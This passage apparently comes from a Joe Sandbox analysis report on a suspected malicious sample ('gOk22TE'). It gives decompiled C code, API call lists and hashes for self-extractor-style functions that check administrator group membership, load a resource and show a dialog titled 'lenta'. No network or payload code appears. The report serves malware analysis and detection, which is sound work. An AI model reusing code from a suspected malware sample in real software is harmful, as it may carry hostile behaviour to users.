                                                                                                                                                                                                                                                0x010e3120
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e312a
                                                                                                                                                                                                                                                0x010e3134
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3134
                                                                                                                                                                                                                                                0x010e312c
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 010E313B
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 010E314B
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000834), ref: 010E316A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 010E3176
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 010E317D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000834), ref: 010E3185
                                                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000FC), ref: 010E3190
                                                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000FC,010E30C0), ref: 010E31A3
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010E31CA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 7510c387d5a7dda01d7a4d5435f81e05a071290532b1a37e21b8795460e25e35
                                                                                                                                                                                                                                                • Instruction ID: 868cca3ca0114521a9a515a1a90f6e8cb281d551122273dbe03f66e42256abe5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7510c387d5a7dda01d7a4d5435f81e05a071290532b1a37e21b8795460e25e35
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C119031644221FFDB315B2A9C0CB5A3EF4BB4AB61F014699F9E5AF184DB7AC141C741
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E18A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                                                                			E010E18A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x10e8004; // 0x71a8563c
				_v8 = _t23 ^ _t53;
				_t25 =  *0x10e8128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E010E6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E010E17EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x10e8128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x10e8128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}


















                                                                                                                                                                                                                                                0x010e18a3
                                                                                                                                                                                                                                                0x010e18a3
                                                                                                                                                                                                                                                0x010e18ab
                                                                                                                                                                                                                                                0x010e18b2
                                                                                                                                                                                                                                                0x010e18b5
                                                                                                                                                                                                                                                0x010e18be
                                                                                                                                                                                                                                                0x010e18c0
                                                                                                                                                                                                                                                0x010e18c6
                                                                                                                                                                                                                                                0x010e18c7
                                                                                                                                                                                                                                                0x010e18ca
                                                                                                                                                                                                                                                0x010e18cf
                                                                                                                                                                                                                                                0x010e19c9
                                                                                                                                                                                                                                                0x010e19d8
                                                                                                                                                                                                                                                0x010e19d8
                                                                                                                                                                                                                                                0x010e18df
                                                                                                                                                                                                                                                0x010e19b8
                                                                                                                                                                                                                                                0x010e19bd
                                                                                                                                                                                                                                                0x010e19bf
                                                                                                                                                                                                                                                0x010e19bf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e19bd
                                                                                                                                                                                                                                                0x010e18fa
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1912
                                                                                                                                                                                                                                                0x010e19aa
                                                                                                                                                                                                                                                0x010e19ad
                                                                                                                                                                                                                                                0x010e19b3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1927
                                                                                                                                                                                                                                                0x010e1927
                                                                                                                                                                                                                                                0x010e1932
                                                                                                                                                                                                                                                0x010e1936
                                                                                                                                                                                                                                                0x010e19a9
                                                                                                                                                                                                                                                0x010e19a9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e19a9
                                                                                                                                                                                                                                                0x010e194c
                                                                                                                                                                                                                                                0x010e19a2
                                                                                                                                                                                                                                                0x010e19a3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e196e
                                                                                                                                                                                                                                                0x010e1970
                                                                                                                                                                                                                                                0x010e1999
                                                                                                                                                                                                                                                0x010e199c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e199c
                                                                                                                                                                                                                                                0x010e1972
                                                                                                                                                                                                                                                0x010e1972
                                                                                                                                                                                                                                                0x010e1975
                                                                                                                                                                                                                                                0x010e1984
                                                                                                                                                                                                                                                0x010e1985
                                                                                                                                                                                                                                                0x010e198a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e198c
                                                                                                                                                                                                                                                0x010e1991
                                                                                                                                                                                                                                                0x010e1996
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1996
                                                                                                                                                                                                                                                0x010e194c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010E18DD), ref: 010E181A
                                                                                                                                                                                                                                                  • Part of subcall function 010E17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010E182C
                                                                                                                                                                                                                                                  • Part of subcall function 010E17EE: AllocateAndInitializeSid.ADVAPI32(010E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010E18DD), ref: 010E1855
                                                                                                                                                                                                                                                  • Part of subcall function 010E17EE: FreeSid.ADVAPI32(?,?,?,?,010E18DD), ref: 010E1883
                                                                                                                                                                                                                                                  • Part of subcall function 010E17EE: FreeLibrary.KERNEL32(00000000,?,?,?,010E18DD), ref: 010E188A
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010E18EB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 010E18F2
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 010E190A
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 010E1918
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,?,?), ref: 010E192C
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 010E1944
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 010E1964
                                                                                                                                                                                                                                                • EqualSid.ADVAPI32(00000004,?), ref: 010E197A
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?), ref: 010E199C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 010E19A3
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 010E19AD
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2168512254-0
                                                                                                                                                                                                                                                • Opcode ID: 80e2d97bf3786ef9420e872bd25f17e0daf74f81925c8ef8adf1ad34b0fcf30c
                                                                                                                                                                                                                                                • Instruction ID: 18180af1d8adf701d10543581c6c9c8e96629bb7e2e6510eb08b9fc8d0bd5f48
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80e2d97bf3786ef9420e872bd25f17e0daf74f81925c8ef8adf1ad34b0fcf30c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64312A71A00209EFDB609FA6DC88AAFBFFCFF48B50B104469F685E6154D73699048B61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E010E468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}








                                                                                                                                                                                                                                                0x010e4699
                                                                                                                                                                                                                                                0x010e469b
                                                                                                                                                                                                                                                0x010e46a9
                                                                                                                                                                                                                                                0x010e46af
                                                                                                                                                                                                                                                0x010e46b4
                                                                                                                                                                                                                                                0x010e46bc
                                                                                                                                                                                                                                                0x010e46f9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e46f9
                                                                                                                                                                                                                                                0x010e46d9
                                                                                                                                                                                                                                                0x010e46dd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e46e5
                                                                                                                                                                                                                                                0x010e46ef
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e46f5
                                                                                                                                                                                                                                                0x010e46ff

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                • memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: TITLE$lenta
                                                                                                                                                                                                                                                • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                                • Opcode ID: bfc40be86e04a884c0228efe902c6a0e104b4eccbe080d047353a3c6f9c7120a
                                                                                                                                                                                                                                                • Instruction ID: 0267dae0dde62032dd08ee2b89d130583609c4b169708d62b2e147a521e80183
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfc40be86e04a884c0228efe902c6a0e104b4eccbe080d047353a3c6f9c7120a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17018F36340210BBE3301AAB6C0CF2B7EE8DB8DF61F054014FAC9DB144C966884487A2
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                                			E010E17EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x10e8004; // 0x71a8563c
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x10ea288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E010E6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}



















                                                                                                                                                                                                                                                0x010e17f6
                                                                                                                                                                                                                                                0x010e17fd
                                                                                                                                                                                                                                                0x010e1805
                                                                                                                                                                                                                                                0x010e180b
                                                                                                                                                                                                                                                0x010e180d
                                                                                                                                                                                                                                                0x010e1815
                                                                                                                                                                                                                                                0x010e1818
                                                                                                                                                                                                                                                0x010e1820
                                                                                                                                                                                                                                                0x010e1824
                                                                                                                                                                                                                                                0x010e182c
                                                                                                                                                                                                                                                0x010e1832
                                                                                                                                                                                                                                                0x010e1837
                                                                                                                                                                                                                                                0x010e1851
                                                                                                                                                                                                                                                0x010e1854
                                                                                                                                                                                                                                                0x010e185d
                                                                                                                                                                                                                                                0x010e1862
                                                                                                                                                                                                                                                0x010e186c
                                                                                                                                                                                                                                                0x010e1872
                                                                                                                                                                                                                                                0x010e1877
                                                                                                                                                                                                                                                0x010e187e
                                                                                                                                                                                                                                                0x010e187e
                                                                                                                                                                                                                                                0x010e1883
                                                                                                                                                                                                                                                0x010e1883
                                                                                                                                                                                                                                                0x010e185d
                                                                                                                                                                                                                                                0x010e188a
                                                                                                                                                                                                                                                0x010e188a
                                                                                                                                                                                                                                                0x010e18a2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010E18DD), ref: 010E181A
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010E182C
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(010E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010E18DD), ref: 010E1855
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?,?,?,?,010E18DD), ref: 010E1883
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,010E18DD), ref: 010E188A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                                • Opcode ID: 27369c98905bec81fbbe303482e1932502d8d483f20f4879374e915ae9e7cdb3
                                                                                                                                                                                                                                                • Instruction ID: 4e0845ff00ce17e0037ad6bb8e5179883e3db37acc1bc3c7b70922bf7f5e1cef
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27369c98905bec81fbbe303482e1932502d8d483f20f4879374e915ae9e7cdb3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52118431F00209EFDB149FA6DC4DABEBFF8EB48710F500169FA45E7240DA3599008790
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E010E43D0(_t24, _t12);
					SetWindowTextA(_t24, "lenta");
					SetDlgItemTextA(_t24, 0x838,  *0x10e9404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x10e91dc = 1;
					goto L8;
				}
				return 0;
			}








                                                                                                                                                                                                                                                0x010e3459
                                                                                                                                                                                                                                                0x010e345c
                                                                                                                                                                                                                                                0x010e34d8
                                                                                                                                                                                                                                                0x010e34de
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e34e0
                                                                                                                                                                                                                                                0x010e345e
                                                                                                                                                                                                                                                0x010e3463
                                                                                                                                                                                                                                                0x010e349a
                                                                                                                                                                                                                                                0x010e34a0
                                                                                                                                                                                                                                                0x010e34a7
                                                                                                                                                                                                                                                0x010e34b2
                                                                                                                                                                                                                                                0x010e34c4
                                                                                                                                                                                                                                                0x010e34cb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e34cb
                                                                                                                                                                                                                                                0x010e3468
                                                                                                                                                                                                                                                0x010e346e
                                                                                                                                                                                                                                                0x010e3474
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e347c
                                                                                                                                                                                                                                                0x010e348c
                                                                                                                                                                                                                                                0x010e3490
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3496
                                                                                                                                                                                                                                                0x010e3484
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3486
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3486
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 010E3490
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 010E349A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 010E34B2
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000838), ref: 010E34C4
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 010E34CB
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 010E34D8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                                • Opcode ID: e0e494a564392efdeb0ee77f5a618f2c314b7ed6ebcd682f261f99eac31af47a
                                                                                                                                                                                                                                                • Instruction ID: a7e99374409ac04354dca54156f0a69900fde27d38e13228d6800bf226afe5fc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0e494a564392efdeb0ee77f5a618f2c314b7ed6ebcd682f261f99eac31af47a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F01B1B9340114AFD72A5F6BD80C9AE3EE4FB49B51B008054FAC68F584CF36EA41CB81
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E2AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E010E2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x10e8004; // 0x71a8563c
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x10e9a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E010E1680(_t65, E010E17C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E010E65E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E010E1680(_t65, E010E17C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E010E6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}






















                                                                                                                                                                                                                                                0x010e2aac
                                                                                                                                                                                                                                                0x010e2ab7
                                                                                                                                                                                                                                                0x010e2abc
                                                                                                                                                                                                                                                0x010e2abe
                                                                                                                                                                                                                                                0x010e2ac3
                                                                                                                                                                                                                                                0x010e2ac6
                                                                                                                                                                                                                                                0x010e2ac9
                                                                                                                                                                                                                                                0x010e2ace
                                                                                                                                                                                                                                                0x010e2ae6
                                                                                                                                                                                                                                                0x010e2bdc
                                                                                                                                                                                                                                                0x010e2bdc
                                                                                                                                                                                                                                                0x010e2be0
